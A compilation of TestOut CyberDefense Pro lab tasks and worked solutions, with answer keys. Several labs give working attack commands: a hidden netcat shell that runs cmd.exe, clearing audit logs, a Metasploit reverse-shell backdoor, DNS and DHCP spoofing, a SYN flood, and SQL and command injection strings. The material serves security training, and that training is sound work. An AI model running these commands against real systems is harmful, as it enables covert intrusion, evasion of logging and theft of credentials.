TestOut CyberDefense Pro Labs (Modules 8-15)
8.3.6 Create a backdoor with Netcat You are the IT security administrator for a small corporate network. You suspect an employee is misusing a company computer by downloading copyrighted music files at work and storing them on an external drive. You notice that the employee has gone to lunch and decide to use this opportunity to set up a backdoor access and to investigate the external drive at a later time when the employee connects the drive to the computer. You begin by installing netcat on the employee's computer and adding the C:/netcat folder to the path environment variable so that it can be run outside of the folder. In this lab, your task is to: Run netcat from a PowerShell window on Office1 as follows:Execute netcat in detached mode so that it runs in the background when the command prompt window is closed.Execute netcat in listen mode.Configure netcat to listen for connections on port 2222.Configure netcat to execute cmd.exe when a connection is made. Run netcat on IT-Laptop and connect to Office1 as follows:Connect using the hostname or IP address.Connect using port 2222. Inspect the external hard drive (G: drive) for music and video files.
Solution 1. On Office1, run netcat from a PowerShell window as follows: a. Right-click Start and select Windows Powershell (Admin). b. At the prompt, type nc -dlp 2222 -e cmd.exe and press Enter to start netcat in listen mode. c. Close the PowerShell window so the employee doesn't see an open window. 2. On IT-Laptop, run netcat to connect to Office1 as follows: a. From the top navigation tabs, select Floor 1 Overview. b. Under IT Administration, select IT-Laptop. c. From the Favorites bar, open Terminal. d. At the prompt, type nc Office1 2222 and press Enter to start netcat in client mode. 3. Type dir /s g: and press Enter to inspect the G: drive.
8.1.5 Analyze a USB keylogger attack 2 Recently, the administrative assistant found a foreign device connected to the ITAdmin computer while updating some of their hardware. The device was turned over to you, and you have determined that it is a keylogger. You need to sift through the information on the keylogger to find which accounts may be compromised. In this lab, your task is to determine which corporate accounts have been compromised as follows: Plug the keylogger into ITAdmin's USB port. Use the keyboard combination of SBK to toggle the USB keylogger from keylogger mode to USB flash drive mode. Open the LOG.txt file and inspect the contents. Scan the document for corporate passwords or financial information. Answer the questions.
Solution 1. On the Shelf, expand Storage Devices. 2. From the shelf, drag the USB Keylogger to a USB port on ITAdmin. 3. On the monitor, select Click to view Windows 10. 4. Press S + B + K to toggle from the keylogger mode to the flash drive mode. 5. Select Tap to choose what happens with removable drives. 6. Select Open folder to view files. 7. Double-click LOG.txt to open the file. 8. Maximize the window for easier viewing. 9. In the top right, select Answer Questions. 10. In the file, find which account passwords were captured. 11. In the file, find any compromised financial information. 12. Select Score Lab. Question 1: email.com, amazon.com Question 2: 4556358591800117
8.4.6 Clear audit policies You are a cybersecurity consultant and have been asked to work with the ACME, Inc. company to ensure their network is protected from hackers. As part of the tests, you need to disable logging on a Windows system. In this lab, your task is to use Windows PowerShell (as Admin) to: View the current audit policies on the system. Disable all audit policies. Confirm that all the audits were disabled.
Solution 1. Right-click Start and select Windows PowerShell (Admin). 2. Maximize the window for easier viewing. 3. At the command prompt, type auditpol /get /category:* and press Enter to view the current audit policies. Notice the different settings used for each system. 4. Type auditpol /clear /y and press Enter to disable all audit policies. 5. Type auditpol /get /category:* and press Enter to confirm that the audits were disabled. Notice that all of the polices are now set to No Auditing. In this lab, your task is to use Windows PowerShell (as Admin) to: View the current audit policies on the system. Disable all audit policies. Confirm that all the audits were disabled. Complete this lab as follows: Right-click Start and select Windows PowerShell (Admin). Maximize the window for easier viewing. At the command prompt, type auditpol /get /category:* and press Enter to view the current audit policies.Notice the different settings used for each system. Type auditpol /clear /y and press Enter to disable all audit policies. Type auditpol /get /category:* and press Enter to confirm that the audits were disabled.Notice that all of the polices are now set to No Auditing.
8.3.4 Create a backdoor with metasploit You are an ethical hacker consultant working for CorpNet. They want you to discover weaknesses in their network. From outside the CorpNet network, you used Zenmap and discovered that the www_stage server located in CorpNet's DMZ is running an exploitable application named UnrealIRCd. This allows you to set up a backdoor using Metasploit. In this lab, your task is to: Create a backdoor on www_stage using Metasploit by exploiting the UnrealIRCd application using the following information:Search for Unreal exploits.Use the exploit that allows Backdoor Command Execution.Configure the remote host (RHOST) with the 198.28.1.15 IP address; the same IP address as www_stage.Set the payload to the cmd/unix/reverse payload.Verify that the local host (LHOST) was set to the 147.191.29.15 IP address (the same IP address as Consult-Lap2).Execute the exploit.Read the contents of the text file in the /root directory. Answer the question.
Solution 1. Search for UrealIRCd exploits and review the exploit information as follows: a. From the Favorites bar, open Metasploit Framework. b. At the prompt, type search Unreal and press Enter to search for any UnrealIRCd exploits. c. Type info exploit/unix/irc/unreal_ircd_3281_backdoor and press Enter to review the exploit information. Notice that RHOST is required. 2. Use the exploit/unix/irc/unreal_ircd_3281_backdoor exploit and configure the exploit's RHOST IP address as follows: a. Type use exploit/unix/irc/unreal_ircd_3281_backdoor and press Enter to use the exploit. b. Type show options and press Enter. Notice the absence of the current setting for RHOST. c. Type set RHOST 198.28.1.15 and press Enter to configure the remote host setting. d. Type show options and press Enter to confirm that RHOST is set. 3. Set the payload as follows: a. Type show payloads and press Enter to list available payloads. b. Type set payload cmd/unix/reverse and press Enter to specify the correct payload. c. Type show options and press Enter to review the exploit's configuration. Notice that LHOST is automatically set to the IP address for Consult-Lap2. 4. Execute the exploit and examine the text file in the /root directory as follows: a. Type exploit and press Enter to execute the exploit. b. Type ifconfig and press Enter to confirm that the backdoor has been established. Notice the IP address is 198.28.1.15; the same IP address as www_stage. c. Type pwd and press Enter to confirm you are in the /root directory. d. Type ls and press Enter to list the files in the /root directory. e. Type cat Staging_Features_CONFIDENTIAL.txt and press Enter to review the contents of a file that appears to contain sensitive information. 5. In the top right, select Answer Questions. 6. Answer the question. 7. Select Score Lab Question 1: Bagel Barometer
10.1.10 Poison DNS You are the IT security administrator for a small corporate network. You want to spoof the DNS to redirect traffic as part of a man-in-the-middle attack. In this lab, your task is to: Use Ettercap to begin sniffing and scanning for hosts. Set Exec (192.168.0.30) as the target machine Initiate DNS spoofing. From Exec, access rmksupplies.com.
Solution 1. Use Ettercap to begin sniffing and scanning for hosts as follows: a. From the Favorites bar, open Ettercap. b. Select Sniff. c. Select Unified sniffing. d. From the Network Interface drop-down list, select enp2s0. e. Select OK. f. Select Hosts and select Scan for hosts 2. Set Exec (192.168.0.30) as the target machine as follows: a. Select Hosts and select Host list. b. Under IP Address, select 192.168.0.30. c. Select Add to Target 1 to assign it as the target. 3. Initiate DNS spoofing as follows: a. Select Plugins. b. Select Manage the plugins. c. Select the Plugins tab. d. Double-click dns_spoof to activate it. e. Select Mitm. f. Select ARP poisoning. g. Select Sniff remote connections. h. Select OK. 4. From Exec, access rmksupplies.com as follows: a. From the top navigation tabs, select Floor 1 Overview. b. Under Executive Office, select Exec. c. From the task bar, open Chrome. d. In the URL field, type rmksupplies.com and press Enter. Notice that the page was redirected to RUS Office Supplies despite the web address not changing.
10.3.6 Perform and Analyze a SYN Flood Attack
Use Zenmap/nmap to scan ports Started syn flood using Metasploit Filtered for SYN attach using Wireshark Q1What is the source IP address of the SYN flood attack?Your answer: 192.168.0.33Correct answer: 192.168.0.33 Q2Which of the following MAC addresses is initiating the SYN flood attack?Your answer: 00:60:98:7F:41:E0 (IT-Laptop)Correct answer: 00:60:98:7F:41:E0 (IT-Laptop) Explanation In this lab, your task is to perform and monitor a SYN flood attack using the following information: Use Zenmap to find the FTP port on CorpServer (192.168.0.10). Use Metasploit to send a SYN flood attack as follows:Remote host: 192.168.0.10Source host: 192.168.0.33Set the FTP port to match the FTP port used by CorpServer. Use Wireshark to capture the SYN flood on the enp2s0 network interface. Filter to show only TCP SYN packets. Find the MAC address of the computer causing the SYN flood. Answer the questions. Complete this lab as follows: From Zenmap, use nmap to find the FTP port used on CorpServer as follows:From the Favorites bar, open Zenmap.In the Command field, type nmap -p 0-100 192.168.0.10Select Scan.CorpServer is using port 21 for FTP.Close Zenmap. Use Metasploit to send a SYN flood as follows:From the Favorites bar, open Metasploit Framework.At the prompt, type search synflood and press Enter to find a SYN flood Metasploit module.Type use auxiliary/dos/tcp/synflood and press Enter to select the SYN flood module.Type show options and press Enter to view the current options for the SYN flood module.Notice that RHOST and SHOST are unassigned and RPORT is set to port 80.Type set rhost 192.168.0.10 and press Enter to set the RHOST address.Type set shost 192.168.0.33 and press Enter to set the SHOST address.Type set rport 21 and press Enter to set the FTP port.Type show options and press Enter to view the new options for the SYN flood module.Notice that RHOST and SHOST have IP addresses assigned and RPORT is set to port 21 matching CorpServer. Capture SYN flood attacks on the CorpServer machine as follows:From the Favorites bar, open Wireshark.Under Capture, select enp2s0.In the Apply a display filter field, type host 192.168.0.10 and tcp.flags.syn==1Press Enter.Select the blue fin to begin a Wireshark capture.Notice that no packets are being captured. In Metasploit, type exploit and press Enter to start a SYN flood. Capture packets for a few seconds. In Wireshark, select the red box to stop the Wireshark capture.Notice the time between each packet sent to host 192.168.1.10. Notice that only SYN packets were captured. In the top right, select Answer Questions. Answer question 1. In the middle pane, expand Ethernet II.Notice the source MAC address of the computer sending the SYN flood. Answer question 2. Select Score Lab.
10.6.9 Test the Security of a Web Application
You are a cybersecurity consultant and have been asked to work with rmksupplies.com to ensure their network is protected from hackers. You are evaluating the security of their website using Burp Suite. You have already configured Google Chrome to use Burp Suite as a proxy server so that all web traffic passes through Burp Suite. In this lab, your task is to use Burp Suite to evaluate website logins as follows: Open Burpe Suite and turn Intercept off. Monitor the HTTP History tab while logging in to the rmksupplies.com Employee Portal. Username: sramirez Password: mickeyminniegoofypluto Examine the POST entry in HTTP History to discover if this website is vulnerable to attack. Answer the question. Lab Questions Q1 Based on the information in the POST entry in Burp Suite, which recommendation should you make to RMK Supplies regarding their web server? Correct answer: Configure HTTPS on the rmksupplies.com web server. EXPLANATION Complete this lab as follows: Open Burp Suite and turn Intercept off. From the Favorites bar, select Burp Suite. Select Next. Select Start Burp. Select the Proxy tab. Make sure the Intercept subtab is selected. Select Intercept is on to toggle the setting to Intercept is off. Select the HTTP History subtab. Drag the Burp Suite window to the lower part of the screen. Log in to the the Employee Portal on rmksupplies.com. From the Favorites bar, select Google Chrome. In Chrome's address bar, type rmksupplies.com and then press Enter.(In Burp Suite's HTTP History page, you will see the traffic that has been captured so far.)Scroll down to the bottom of the Employee page and select the Employee Portal link. Log in to the Employee Portal Username: sramirez Password: mickeyminniegoofypluto Select Login. Analyze the web traffic in Burp Suite. On the HTTP History tab, note the traffic that has been logged to the web server. Select the line with the POST in the Method column. From the lower pane of Burp Suite, examine the information that was submitted to the web server, such as login credentials. Answer the question.
11.2.12 Bypass Windows Firewall
You are a cybersecurity specialist. The owner of the CorpNet network has hired you to perform a penetration test. They are concerned with the safety of their firewalls. During the reconnaissance phase of your testing, you discovered a firewall with an IP address of 198.28.2.254. From outside of the CorpNet network, you decided to scan this firewall for potential weakness by running an nmap scan.
10.6.10 Test the Security of a Web Application 2
You are a security analyst and have been testing Burp Suite with your online bank. You have already configured Google Chrome to use Burp Suite as a proxy server, allowing all web traffic to pass through Burp Suite. In this lab, your task is to explore Burp Suite repeater: Open Burp Suite and turn off Intercept. Look up your account balance on mysecureonlinebank.com using the following information: Use Google Chrome. Bank URL: mysecureonlinebank.com Account number: 90342 From Burp Suite, explore the repeater using mysecureonlinebank.com as follows: Send the GET entry containing an account number to the Repeater. In repeater, alter the account number to 90639 and then resend the page. Answer Question 1. Use the Repeater to perform a simple injection attack using the following information: Alter the account number to 90639 OR 1=1 and then resend the page. Answer Question 2. Alter the account number to 90639 && whoami and then resend the page. Answer Question 3. Lab Questions Q1 Who owns account 90639? Correct answer: Olivia Martinez Q2 What is the account ID for Zoya Franco? Correct answer: 90005 Q3 What is the name of the user account the web server is using? Correct answer: www-login EXPLANATION Complete this lab as follows: Open Burp Suite and turn off Intercept. From the Favorites bar, select burpsuite. Select Next. Select Start Burp. Select the Proxy tab. Make sure the Intercept sub-tab is selected. Select Intercept is on to toggle the setting to Intercept is off. Select the HTTP history sub-tab. Drag the Burp Suite window to the lower part of the screen. Look up your account balance on mysecureonlinebank.com. From the Favorites bar, select Google Chrome. In Chrome's address bar, type mysecureonlinebank.com and then press Enter. For the Account Number, type 90342 and then select Lookup. From Burp Suite, explore the repeater using mysecureonlinebank.com. From Burp Suite's HTTP history tab, right-click the request that shows GET in the Method column and the account number in the URL column and then select Send to Repeater. Maximize the Burp Suite window for better viewing. Select the Repeater tab. You see mysecureonlinebank.com request displayed in the Request side. Locate and change the account number to 90639 and then select Go to resend the request. Examine the results on the Response side. In the top right, select Answer Questions. Answer Question 1. Use the Repeater to perform a simple injection attack. Change the account number to 90639 OR 1=1 to attempt a simple injection attack. Select Go. Examine the results in the response side. Remember to scroll down to see all the results. Answer Question 2. Change the account number to 90639 && whoami to attempt another simple injection attack. Select Go. Examine the results on the response side. Answer Question 3. Select Score Lab.
10.3.10 Analyze a DDoS Attack
You are the CorpNet IT administrator. Your support team says that CorpNet's customers are unable to browse to the public-facing web server. You suspect that it might be under some sort of denial-of-service attack, possibly a TCP SYN flood attack. Your www_stage computer is on the same network segment as your web server, so you'll use this computer to investigate the problem. In this lab, your task is to: Capture packets from the network segment on www_stage using Wireshark. Analyze the attack using the following filters:tcp.flags.syn==1 and tcp.flags.ack==1tcp.flags.syn==1 and tcp.flags.ack==0 Answer the question.
10.3.6 Create a Honeypot with Pentbox
You are the IT security administrator for a small corporate network. You are concerned about unauthorized activity in your DMZ, so you decide to set up a honeypot to study hacking attempts. In this lab, your task is to: Use Pentbox to create a honeypot. Test the honeypot on Consult-Lap using www_stage.corpnet.xyz in Chrome. Verify the intrusion. Required Actions & Questions Create a honeypot on www_stage Browse to the honeypot from Marketing3 Q1 Which message is displayed? Correct answer: Access denied Q2 What is the IP address associated with the intrusion attempt? Correct answer:192.168.0.39 EXPLANATION Complete this lab as follows: Use Pentbox to create a honeypot on www_stage. From the Favorites bar, select Terminal. At the prompt, type cd pentbox-1.8 and press Enter to change to the pentbox directory. Type ./pentbox.rb and press Enter to start Pentbox. Type 2 and press Enter to select Network Tools. Type 3 and press Enter to select Honeypot. Type 1 and press Enter to select Fast Auto Configuration. From the Analyst-Lap computer, test the honeypot using Google Chrome. From the top navigation tabs, select Buildings. Under Building A, select Floor 2.Under Marketing Group B, select Marketing3.From the taskbar, select Google Chrome. In the URL field, enter www_stage.corpnet.xyz and press Enter. In the top right, select Answer Questions. Answer Question 1. Minimize the Lab Questions dialog. Review the effects of the intrusion on www_stage. From the top navigation tabs, select Building A. Under Building A, select Basement. Under Basement, select www_stage. Notice the INTRUSION ATTEMPT DETECTED message at the bottom of the Pentbox window. Answer the questions. In the top right, select Answer Questions. Answer Question 2.Select Score Lab.
10.2.6 Perform a DHCP Spoofing mitm attack
You are the IT security administrator for a small corporate network. You're experimenting with DHCP spoofing attacks using Ettercap. In this lab, your task is to complete the following: On IT-Laptop, use Ettercap to launch a man-in-the-middle DHCP spoofing attack using the following parameters:Netmask: 255.255.255.0DNS Server IP: 192.168.0.11 On Support, complete the following tasks:Start a capture in Wireshark and filter the display for DHCP traffic.View the IP address and the gateway in Terminal.Bring the network interface down and back up to request a new DHCP address.In Wireshark, how many DHCP packets were exchanged?View the IP address and gateway again. What has changed? On Office1, complete the following tasks:Use tracert to rmksupplies.com to find the path. What is the path?Check the IP address of the computer.Release and renew the IP address assigned by DHCP.Check the IP address of the computer again. What has changed?Use tracert to rmksupplies.com to find the path again. What has changed?Log in to the rmksupplies.com employee portal with the following credentials:Username: bjacksonPassword: $uper$ecret1 On IT-Laptop, find the captured username and password in Ettercap. Answer the questions.
10.6.15 Configure URL Blocking
You are the security analyst for a small corporate network. After monitoring your network, you have discovered that several employees are wasting time visiting non-productive and potentially malicious websites. As such, you have added pfBlockerNG to your pfSense device. You now need to configure this feature and add the required firewall rules that allow/block specific URLs and prevent all DNS traffic from leaving your LAN network. In this lab, your task is to: Sign in to pfSense using: Username: admin Password: P@ssw0rd (zero) Create a firewall rule that blocks all DNS traffic leaving the LAN network. Create a firewall rule that allows all DNS traffic going to the LAN network. Use the following table for the two rules: Protocol --->UDP (53) Descriptions --->For the block rule: Allow all DNA to LAN Arrange the firewall rules in the order that allows them to function properly. Enable and configure pfBlockerNG using the information in the following table: DNSBL Virtual IP - 192.168.0.0 Top-Level Domain (TLD) Blacklist - instagram.com, netflix.com, googleanalytics.net Top-Level Domain (TLD) Whitelist - www.google.com, play.google.com, drive.google.com EXPLANATION Complete this lab as follows: Sign into the pfSense management console. In the Username field, enter admin. In the Password field, enter P@ssw0rd (zero). Select SIGN IN or press Enter. Create a firewall rule that blocks all DNS traffic leaving the LAN network. From the pfSense menu bar, select Firewall > Rules. Under the Firewall breadcrumb, select LAN. Select Add (either one). Under Edit Firewall Rule, use the Action drop-down to select Block. Under Edit Firewall Rule, set Protocol to UDP. Under Source, use the drop-down menu to select LAN net. Under Destination, configure the Destination Port Range to use DNS (53) (for From and To). Under Extra Options, in the Description field, enter Block DNS from LAN. Select Save. Select Apply Changes. Create a firewall rule that allows all DNS traffic going to the LAN network. Select Add (either one). Under Edit Firewall Rule, make sure Action is set to Pass. Under Edit Firewall Rule, set Protocol to UDP. Under Destination, use the drop-down menu to select LAN net. Configure the Destination Port Range to use DNS (53) (for From and To). Under Extra Options, in the Description field, enter Allow all DNS to LAN. Select Save. Select Apply Changes. Arrange the firewall rules in the order that allows them to function properly. Using drag-and-drop, move the rules to the following order (top to bottom): Anti-Lockout Rule Allow all DNS to LAN Block DNS from LAN In the simulated version of pfSense, you can only drag and drop the rules you created. You cannot drag and drop the default rule. Select Save. Select Apply Changes. Enable pfBlockerNG. From the pfSense menu bar, select Firewall > pfBlockerNG. Under General Settings, select Enable pfBlockerNG. Scroll to the bottom and select Save. Enable and configure DNS block lists. Under the Firewall breadcrumb, select DNSBL. Select Enable DNSBL. For DNSBL Virtual IP, enter 192.168.0.0. Scroll to the bottom and expand TLD Blacklist. Enter the following URLs in the TLD Blacklist box: instagram.com netflix.com googleanalytics.net Expand TLD Whitelist and then enter the following URLs: .www.google.com .play.google.com .drive.google.com Select Save.
10.4.8 Analyze FTP Credentials with Wireshark
You are the security analyst for a small corporate network. You are concerned that several employees may still be using the unsecured FTP protocol against company policy. You have decided to run a test to see if FTP is being used. If any FTP packets are found, you need to determine information about who is using this protocol. In this lab, your task is to capture FTP packets as follows: Use Wireshark to capture packets on the enp2s0 interface for five or more seconds. Filter for FTP packets. Answer the questions. Required Actions & Questions Filtered for FTP packets Q1 What is the name used to log into the FTP session?Correct answer: Guest Q2 What is the password used to log into the FTP site?Correct answer: Fr33to@ll Q3 What is the name of the file downloaded during the FTP session? Correct answer:SalesContacts.txt Q4 What is the IP address of the computer requesting an FTP connection? Correct answer:192.168.0.50 EXPLANATION Complete this lab as follows: Using Wireshark, capture packets for five seconds. From the Favorites bar, select Wireshark. Under Capture, select enp2s0.Select the blue fin to begin a Wireshark capture. Capture packets for five seconds. Select the red box to stop the Wireshark capture. Maximize the window for easier viewing. Apply the FTP filter and answer the questions. In the Apply a display filter field, type ftp and press Enter. In the top right, select Answer Questions. Answer the questions. (Optional) Use filters for only the required information In the Apply a display filter field, type ftp.request.command==USER and then press Enter to find the user account. In the Apply a display filter field, type ftp.request.command==PASS and then press Enter to find the password. In the Apply a display filter field, type ftp.request.command==RETR and then press Enter to find the file retrieved. Select Score Lab.
10.4.11 Evaluate Webserver Security
You are the security analyst working for CorpNet. Your company wants to protect against any potential weakness in the their public-facing servers. They would like to make sure that all of their servers are running up to date web server software, and they don't want to expose the servers to threats by using outdated security protocols or easily exploitable ports. Computer Name; IP Address; Domain Name CorpNet_www; 198.28.1.1; www.corpnet.xyz CorpNet_www2; 198.28.1.2; www2.corpnet.xyz CorpNet_www3; 198.28.1.3; www3.corpnet.xyz www_stage; 198.28.1.1; 5www_stage.corpnet.xyz In this lab, your task is to scan the public facing web servers as follows: Run the curl --head command against each server. Using nmap, run the ssl-enum-ciphers.nse script against the secure web server port on each server. Answer the questions. Lab Questions Q1 Which servers have outdated web server software running? Correct answer:www3.corpnet.xyz (198.28.1.3) Q2 Which servers require attention to correct outdated security protocols? Correct answer: www.corpnet.xyz (198.28.1.1), www_stage.corpnet.xyz (198.28.1.15) Q3 Which server requires attention to correct vulnerable open ports? Correct answer:www_stage.corpnet.xyz (198.28.1.15) Complete this lab as follows: Run the curl --head command against each server. From the Favorites bar, select Terminal. At the prompt, type curl --head ip address and press Enter. In the top right, select Answer Questions. Answer Question 1. Run the ssl-enum-cyphers.nse script against each server. In Terminal, type nmap --script=ssl-enum-ciphers -p443 ip address and press Enter to run the ssl-enum-ciphers.nse script. In the top right, select Answer Questions. Answer the remaining Questions. Select Score Lab.
11.2.7 Configure a Perimeter Firewall
You work as the IT security administrator for a small corporate network. You recently placed a web server in the DMZ. You need to configure the perimeter firewall on the network security appliance to allow access to the web server from the LAN and the WAN. You would also like to improve security by utilizing the attack security features provided by the firewall. Complete this lab as follows: Configure the firewall as follows:From the top menu of the Security Appliance Configuration Utility, select Firewall.From the left pane, select IPv4 Rules.In the right pane, select Add.Modify the firewall rule parameters.Click Apply.Repeat steps 1c-1e for each firewall rule. Enable firewall attack checks as follows:From the left pane, select Attacks.Select all the WAN security checks.Select all the LAN security checks.Select all the ICSA settings.Click Apply.
11.2.10 Perform a Decoy Scan with Zenmap
You work for a penetration testing consulting company. You need to make sure that you can't be identified by the intrusion detection systems. In this lab, your task is to perform a decoy scan on CorpNet.local as follows: Tools: Wireshark and Zenmap Interface: enp2s0 Random IP addresses:25 IP address: 192.168.0.31 In this lab, your task is to perform a decoy scan on CorpNet.local as follows: Tools: Wireshark and Zenmap Interface: enp2s0 Random IP addresses:25 IP address: 192.168.0.31 Complete this lab as follows: From the Favorites bar, open Wireshark. Under Capture, select enp2s0. In the upper left menu, select the blue shark fin to start a scan. From the Favorites bar, open Zenmap. In the Command field, type nmap -D RND:25. In the Target field, type 192.168.0.31. Select Scan. Maximize the Wireshark window. In Wireshark, scroll down until you see 192.168.0.31 in the Destination column. Under Source, view the different IP addresses used to disguise the scan.
9.2.8 Counter malware with windows defender You recognize that the threat of malware is increasing and have implemented Windows Defender on the office computers. In this lab, your task is to configure Windows Defender as follows: Add a file exclusion for D:\Graphics\cat.jpg. Add a process exclusion for welcome.scr. Update protection definitions before performing the scan. Perform a quick scan.
1. Add a file exclusion as follows: a. In the search field on the taskbar, enter Windows Defender. b. Under Best match, select Windows Defender Security Center. c. Maximize the window for easier viewing. d. Select Virus & threat protection. e. Select Virus & threat protection settings. f. Under Exclusions, select Add or remove exclusions. g. Select the + (plus sign) next to Add an exclusion. h. From the drop-down lists, select File. i. Under This PC, select Data (D:). j. Double-click Graphics. k. Select cat.jpg. l. Select Open. 2. Add a process exclusion as follows: a. Select the + (plus sign) next to Add an exclusion. b. From the drop-down lists, select Process. c. In the Enter process name field, enter welcome.scr for the process name. d. Select Add. 3. Update protection definitions as follows: a. In the left menu, select the shield icon. b. Select Protection updates. c. Select Check for updates. 4. Perform a quick scan as follows: a. In the left menu, select the shield icon. b. Under Scan History, select Quick scan to run a quick scan now.
12.2.4 Configure Security Appliance
Access the pfSense management console. From the taskbar, select Google Chrome. Maximize the window for better viewing. In the address bar, type 198.28.56.22 and then press Enter. Sign in using the following case-sensitive information: Username: admin Password: pfsense Select SIGN IN or press Enter. Configure the DNS Servers. From the pfSense menu bar, select System > General Setup. Under DNS Server Settings, configure the primary DNS server as follows: Address: 163.128.78.93 Hostname: DNS1 Gateway: None Select Add DNS Server to add a secondary DNS server and then configure it as follows: Address: 163.128.80.93 Hostname: DNS2 Gateway: None Scroll to the bottom and select Save. Configure the WAN settings. From pfSense menu bar, select Interfaces > WAN. Under General Configuration, select Enable interface. Use the IPv4 Configuration Type drop-down to select Static IPv4. Under Static IPv4 Configuration, in the IPv4 Address field, enter 65.86.24.136. Use the IPv4 Address subnet drop-down to select 8. Under Static IPv4 Configuration, select Add a new gateway. Configure the gateway settings as follows: Default: Select Default gateway Gateway name: Enter WANGateway Gateway IPv4: 65.86.1.1 Select Add. Scroll to the bottom and select Save. Select Apply Changes.
10.1.12 Analyze email traffic for sensitive data
As the IT security specialist for your company, you are performing a penetration test to verify the security of the accounting department. You are concerned that invoice emails can be captured and the information gleaned from these emails can be used to help hackers generate fake invoice requests. In this lab, your task is to: Capture packets on the enp2s0 interface using Wireshark. Find packets containing invoice emails using display filters. Check to see if the following information can be seen in clear text format in the invoice emails:Source and destination email addressesNames of those that sent or received the emails
10.1.13 Analyze email traffic for sensitive data 2
As the IT security specialist for your company, you're performing a penetration test to verify email security. You are specifically concerned that the HR department may be sending employee's personally identifiable information (PII) in clear text through emails. In this lab, your task is to: Capture packets on the enp2s0 interface using Wireshark. Find packets containing the following information using display filters:Social security numbers (SSN)Birth datesDirect deposit routing numbersMother's maiden nameFavorite carFavorite movie
12.2.9 Evaluate Network Security with Hunter-1
Complete this lab as follows: Access Security Onion.From the Favorites bar, select Google Chrome.In the address field, enter 192.168.0.101 and press Enter to access Security Onion.Log in to Security Onion using the following:Email address: [email protected]: passwordSelect LOGIN. Access Hunt.Select the hamburger menu and then click Hunt.Maximize the window for better viewing. Examine the ET INFO Dotted Quad Host DLL Request alert event.Under Events, expand the ET INFO Dotted Quad Host DLL Request event.Examine the various fields, especially network.data.decoded.In the top right, select Answer Questions.Answer Questions 1 and 2. Examine the ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 alert event.From Hunt Events, expand the ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 event.Examine the various fields, especially event.module and network.data.decoded.Answer Questions 3 and 4.Select Score Lab.
12.2.5 Configure Security Appliance Access
Complete this lab as follows: Access the pfSense management console.From the taskbar, select Google Chrome.Maximize the window for better viewing.In the Google Chrome address bar, enter 198.28.56.22 and then press Enter.Enter the pfSense sign-in information as follows:Username: adminPassword: pfsenseSelect SIGN IN. Change the password for the default (admin) account.From the pfSense menu bar, select System > User Manager.For the admin account, under Actions, select the Edit user icon (pencil).For the Password field, change to [email protected] the Confirm Password field, enter [email protected] to the bottom and select Save. Create and configure a new pfSense user.Select Add.For Username, enter lyoung.For the Password field, enter C@nyouGuess!t.For the Confirm Password field, enter C@nyouGuess!t.For Full Name, enter Liam Young.For Group Membership, select admins and then select Move to Member of list.Scroll to the bottom and select Save. Set a session timeout for pfSense.Under the System breadcrumb, select Settings.For Session timeout, enter 20.Select Save. Disable the webConfigurator anti-lockout rule for HTTP.From the pfSense menu bar, select System > Advanced.Under webConfigurator, for Protocol, select HTTP.Select Anti-lockout to disable the webConfigurator anti-lockout rule.Scroll to the bottom and select Save.
11.2.4 Discover Bluetooth Devices
Complete this lab as follows: Initialize the Bluetooth adapter. From the Favorites bar, select Terminal. At the prompt, type hciconfig and press Enter to view the onboard Bluetooth adapter. Type hciconfig hci0 up and press Enter to initialize the adapter. Type hciconfig and press Enter to verify that the adapter is up and running. Find all Bluetooth devices within range. Type hcitool scan and press Enter to view the detected Bluetooth devices and their MAC addresses. In the top left, select Answer Questions. Answer Question 1. Determine if the Bluetooth devices found are in range. Type l2ping MAC_address and press Enter to determine if the Bluetooth device is in range. Press Ctrl + c to stop the ping process To copy the MAC addresses from the scan, highlight the MAC address and then right-click. Repeat steps 3a-3b for all the devices. Answer Question 2. Find details for Francisco's laptop using sdptool. Type sdptool browse AF:52:23:92:EF:AF and press Enter to view the details for Francisco's laptop. Answer Question 3. Find details for Brian's Echo Show using hcitool. Type hcitool inq and press Enter to determine the clock offset and class for each device. Answer Question 4. Select Score Lab.
10.7.8 Configure Windows Defender Application Control
EXPLANATION Complete this lab as follows: From Office2, create an XML file that will be used to create the initial code integrity policy (CIPolicy). Right-click Start and then select Windows PowerShell (Admin). From PowerShell, run New-CIpolicy AppCIP.xml -Level Pca -ScanPath C:\ -UserPEs Wait for the scan to complete. Convert the XML file to a binary file and save it on CorpDC in the WDAC share. From PowerShell, run ConvertFrom-CIPolicy AppCIP.xml C:\AppCIP.bin From the Windows taskbar, select File Explorer. From the left pane, expand and select This PC > System (C:). Right-click AppCIP.bin and then select Copy. From the left pane, expand and select Network > CorpDC > WDAC In the right pane, right-click and select Paste. Switch to CorpServer and connect to the Hyper-V CorpDC server. From the top navigation area, select Floor 1 Overview. Under Networking Closet, select CorpServer. From the Hyper-V Manager, select CORPSERVER. From the Virtual Machines pane, double-click CorpDC. Create the WDAC GPO in the CorpNet.local domain. From Server Manager's menu bar, select Tools > Group Policy Management. Maximize the window for better viewing. Expand Forest: CorpNet.local > Domains. Right-click CorpNet.local and select Create a GPO in this domain, and link it here. In the Name field, use App-WDAC and then select OK. Enable and configure the Deploy Windows Defender Application Control policy to distribute the AppCIP initial code integrity policy. Expand CorpNet.local and then right-click App-WDAC and select Edit. Maximize the window for better viewing. From the left pane, expand and select Computer Configuration > Policies > Administrative Templates > System > Device Guard. From the right pane, double-click Deploy Windows Defender Application Control. Select Enabled. In the Code Integrity Policy file path field, enter C:\WDAC\AppCIP.bin. Click OK.
11.1.16 Configure a Captive Portal
EXPLANATION Complete this lab as follows: Sign into the pfSense management console.In the Username field, enter admin.In the Password field, enter P@ssw0rd (zero).Select SIGN IN or press Enter. Add a captive portal zone.From the pfSense menu bar, select Services > Captive Portal.Select Add.For Zone name, enter WiFi-Guest.For Zone description, enter Guest wireless access zone.Select Save & Continue. Enable and configure the captive portal.Under Captive Portal Configuration, select Enable.For Interfaces, select GuestWi-Fi.For Maximum concurrent connections, select 50.For Idle timeout, enter 15.For Hard timeout, enter 45.Scroll down and select Per-user bandwidth restriction.For Default download (Kbit/s), enter 7000.For Default upload (Kbit/s), enter 2400.Under Authentication, use the drop-down menu to select None, don't authenticate users.Scroll to the bottom and select Save. Allow a MAC address to pass through the portal.From the Captive Portal page, select the Edit Zone icon (pencil).Under the Services breadcrumb, select MACs.Select Add.Make sure the Action field is set to Pass.For Mac Address, enter 00:00:1C:11:22:33.Select Save. Allow an IP address to pass through the portal.Under the Services breadcrumb, select Allowed IP Addresses.Select Add.For IP Address, enter 198.28.1.100.Use the IP address drop-down menu to select 16. This sets the subnet mask to 255.255.0.0.For the Description field, enter 